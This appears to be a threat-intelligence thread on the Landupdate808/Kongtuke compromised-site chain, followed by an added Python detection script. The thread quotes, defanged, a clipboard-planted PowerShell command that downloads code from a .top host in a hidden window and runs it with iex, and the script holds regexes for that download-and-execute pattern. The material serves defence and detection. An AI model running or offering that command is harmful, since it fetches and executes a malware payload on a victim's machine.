Likely next #Landupdate808 / #Kongtuke infra:
rshank[.]com

Still was never able to get a payload from the last reported infra, vicrin[.]com

Well, I figured it out, thanks to some help by @rmceoin

Victim site
-->
rshank[.]com/metrics.js (Landupdate808 infra)
-->
cloudflare[.]com/cdn-cgi/trace (fingerprinting checks)
-->
hxxps[:]//rshank[.]com/js.php?device=[OS]&ip=[IP INFO]=&refferer=[REFERRER URL]=&browser=[BROWSER]&ua=[USER AGENT]&domain=[KONGTUKE INFRA]&loc=[COUNTRY CODE]=&is_ajax=1

Ctrl+C then copies

powershell -WindowStyle Hidden $global:block=curl -useb hxxp[:]//527newagain[.]top/1.php?s=527;iex $global:block.content

Not able to get the payload off of the curl command though, not sure if it's live.

cc @MalasadaTech figured you might be interested, this is a new tactic for them

@cyberamateur @rmceoin @MalasadaTech the payload is TA582, same thing that drops from SG non-domain joined chain
@GustyDusty @cyberamateur @MalasadaTech oh! I felt like the whole blahblah.top /1.php ? s= format seemed familiar.
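
Added example, not written by anyone in the thread: detection logic for the two artifacts posted above, the js.php fingerprint request and the command placed on the clipboard, run against the defanged strings exactly as they appear in the thread. The function names, the extra cmdlet aliases and the match thresholds are assumptions chosen for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

def refang(s):
    """Undo the defanging used in the thread (hxxp, [:], [.])."""
    return s.replace("hxxp", "http").replace("[:]", ":").replace("[.]", ".")

# Query keys of the js.php request as posted ("refferer" is spelled as observed).
JS_PHP_KEYS = {"device", "ip", "refferer", "browser", "ua", "domain", "loc", "is_ajax"}

def is_fingerprint_beacon(url, min_keys=6):
    """True for a */js.php request carrying most of the observed key set."""
    parts = urlsplit(refang(url))
    keys = set(parse_qs(parts.query, keep_blank_values=True))
    return parts.path.endswith("/js.php") and len(keys & JS_PHP_KEYS) >= min_keys

# Heuristic traits of the clipboard command (alias list and threshold are assumptions).
TRAITS = {
    "hidden_window": re.compile(r"powershell.*\s-w[a-z]*\s+h[a-z]*", re.I),
    "web_download": re.compile(
        r"\b(curl|wget|iwr|irm|invoke-webrequest|invoke-restmethod)\b", re.I),
    "invoke_expression": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "numbered_php_s_url": re.compile(r"https?://[^/\s]+\.top/\d+\.php\?s=\w+", re.I),
}

def command_traits(cmdline):
    """Names of the traits present in a process command line or clipboard string."""
    c = refang(cmdline)
    return [name for name, rx in TRAITS.items() if rx.search(c)]

def is_suspicious(cmdline, min_traits=3):
    return len(command_traits(cmdline)) >= min_traits

# Strings copied from the thread, kept defanged in source.
THREAD_BEACON = ("hxxps[:]//rshank[.]com/js.php?device=[OS]&ip=[IP INFO]=&refferer="
                 "[REFERRER URL]=&browser=[BROWSER]&ua=[USER AGENT]&domain="
                 "[KONGTUKE INFRA]&loc=[COUNTRY CODE]=&is_ajax=1")
THREAD_COMMAND = ("powershell -WindowStyle Hidden $global:block=curl -useb "
                  "hxxp[:]//527newagain[.]top/1.php?s=527;iex $global:block.content")
# Constructed benign inputs for contrast.
BENIGN_URL = "https://example.com/js.php?v=2"
BENIGN_COMMAND = "powershell -NoProfile -Command Get-Date"

if __name__ == "__main__":
    for url in (THREAD_BEACON, BENIGN_URL):
        print(is_fingerprint_beacon(url), url[:40])
    for cmd in (THREAD_COMMAND, BENIGN_COMMAND):
        print(is_suspicious(cmd), command_traits(cmd))
```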